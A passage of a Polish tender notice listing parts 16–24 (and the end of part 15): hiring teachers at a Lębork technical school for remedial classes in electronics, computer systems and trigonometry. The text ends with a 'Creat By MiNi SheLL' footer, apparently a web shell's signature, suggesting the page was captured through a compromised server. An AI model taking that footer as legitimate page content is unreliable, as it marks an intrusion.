2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie elektroniki i elektrotechniki na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- umiejętność rozróżniania wielkości elektrycznych i ich jednostek miar,
- umiejętność zastosowania prawa Ohma i Kirchhoffa do obliczania obwodów prądu stałego,
- umiejętność obliczania rezystancji zastępczej obwodu, oszacowania rozpływów prądów i rozkładów napięć w obwodach,
- umiejętność scharakteryzowania parametrów przebiegu sinusoidalnego,
- umiejętność objaśnienia zależności pomiędzy napięciami i prądami w obwodach RLC..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Elektronika i elektrotechnika na poziomie technikum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie elektroniki i elektrotechniki na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- umiejętność rozróżniania wielkości elektryczne i ich jednostki miar,
- umiejętność zastosowania prawa Ohma i Kirchhoffa do obliczania obwodów prądu stałego,
- umiejętność obliczania rezystancji zastępczej obwodu, oszacowania rozpływów prądów i rozkładów napięć 
 w obwodach,
- umiejętność scharakteryzowania parametrów przebiegu sinusoidalnego,
- umiejętność objaśnienia zależności pomiędzy napięciami i prądami w obwodach RLC..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Maszyny elektryczne na poziomie technikum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie maszyn elektrycznych na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- umiejętność sklasyfikowania maszyny elektrycznej biorąc pod uwagę: sposób zasilania, zasadę działania, rodzaj przetwarzanej energii, budowę,
- umiejętność wyjaśnienia zasady działania podstawowych rodzajów maszyn elektrycznych,
- rozróżnianie na podstawie wyglądu rodzaj maszyny,
- zdolność korzystania z danych zawartych na tabliczce znamionowej,
- określanie właściwości ruchowe maszyn na podstawie przebiegu ich charakterystyk,
- dobieranie odpowiednich sposobów rozruchu maszyn i regulacji prędkości,
- korzystanie z norm i katalogów oraz przepisów dotyczących budowy i eksploatacji maszyn elektrycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów lub uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Systemy komputerowe na poziomie technikum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie systemów komputerowych na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- kompetencje informatyczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- zdefiniowanie podstawowych pojęcia dotyczące lokalnych sieci komputerowych,
- umiejętność scharakteryzowania pojęcia: topologia sieci, środowisko sieciowe (peer to peer, klient-serwer), sieć LAN, ramka
- zdolność identyfikacji metody dostępu do sieci LAN (rywalizacja, przesyłanie tokenu, priorytet żądań oraz przełączanie),
- umiejętność zdefiniowania pojęcia: medium transmisyjne, router, hub, switch, firewall, AP, karta sieciowa, modem, szafa rack,
- zdolność identyfikacji materiały, urządzenia i narzędzia występujące w procesie budowy lokalnej sieci komputerowej,
- umiejętność zastosowania normy i certyfikaty zgodności w procesie montażu okablowania strukturalnego,
- umiejętność doboru elementów komputerowej sieci strukturalnej do określonej architektury sieci..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Liczby zespolone w elektrotechnice na poziomie technikum- grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 40 godzin zajęć wyrównawczych w zakresie liczb zespolonych w elektrotechnice na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania :
- wrzesień 2014 - grudzień 2014 = min.15 godziny
- styczeń 2015 - czerwiec 2015 = 25 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- rozwiązywanie samodzielnie i w zespole zadania z teorii liczb zespolonych, 
- formułowanie definicji i wykorzystywanie poznanych twierdzeń do rozwiązywania prostych problemów teoretycznych,
- umiejętność doboru odpowiednich narzędzi matematycznych przydatnych do rozwiązywania konkretnych zadań dotyczących teorii liczb zespolonych,
- umiejętność stosowania teorii liczb zespolonych do wykonywania obliczeń z zakresu elektrotechnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów lub uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Liczby zespolone w elektrotechnice na poziomie technikum- grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 40 godzin zajęć wyrównawczych w zakresie liczb zespolonych w elektrotechnice na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania:
- wrzesień 2014 - grudzień 2014 = min.15 godziny
- styczeń 2015 - czerwiec 2015 = 25 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- rozwiązywanie samodzielnie i w zespole zadania z teorii liczb zespolonych,
- formułowanie definicji i wykorzystywanie poznanych twierdzeń do rozwiązywania prostych problemów teoretycznych,
- umiejętność doboru odpowiednich narzędzi matematycznych przydatnych do rozwiązywania konkretnych zadań dotyczących teorii liczb zespolonych.
- umiejętność stosowania teorii liczb zespolonych do wykonywania obliczeń z zakresu elektrotechnik..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów lub uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w elektrotechnice na poziomie technikum- grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 40 godzin zajęć wyrównawczych w zakresie funkcji trygonometrycznych w elektrotechnice na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania:
- wrzesień 2014 - grudzień 2014 = min.15 godziny
- styczeń 2015 - czerwiec 2015 = 25 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji sinus i cosinus,
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji tangens i cotangens,
- umiejętność zastosowania podstawowych tożsamości trygonometrycznych i wzorów redukcyjnych,
- umiejętność zastosowania funkcji trygonometrycznych w elektrotechnice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów lub uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w elektrotechnice na poziomie technikum- grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 40 godzin zajęć wyrównawczych w zakresie funkcji trygonometrycznych w elektrotechnice na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania:
- wrzesień 2014 - grudzień 2014 = min.15 godziny
- styczeń 2015 - czerwiec 2015 = 25 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji sinus i cosinus,
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji tangens i cotangens,
- umiejętność zastosowania podstawowych tożsamości trygonometrycznych i wzorów redukcyjnych,
- umiejętność zastosowania funkcji trygonometrycznych w elektrotechnice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów lub uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w mechanice na poziomie technikum- grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 40 godzin zajęć wyrównawczych w zakresie funkcji trygonometrycznych w mechanice na poziomie technikum w oparciu o opracowany przez nauczyciela/nauczycielkę autorski program nauczania :
- wrzesień 2014 - grudzień 2014 = min.15 godziny
- styczeń 2015 - czerwiec 2015 = 25 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji sinus i cosinus,
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji tangens i cotangens,
- umiejętność zastosowania podstawowych tożsamości trygonometrycznych i wzorów redukcyjnych,
- umiejętność zastosowania funkcji trygonometrycznych w mechanice.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów lub uczennic ZSMI oraz przeprowadzi cykl 40 godzin zajęć wyrównawczych Funkcje trygonometryczne w mechanice na poziomie technikum- grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 40 godzin zajęć wyrównawczych w zakresie funkcji trygonometrycznych w mechanice na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania :
- wrzesień 2014 - grudzień 2014 = min.15 godziny
- styczeń 2015 - czerwiec 2015 = 25 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji sinus i cosinus,
- umiejętność scharakteryzowania parametrów i właściwości przebiegu funkcji tangens i cotangens,
- umiejętność zastosowania podstawowych tożsamości trygonometrycznych i wzorów redukcyjnych,
- umiejętność zastosowania funkcji trygonometrycznych w mechanice.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com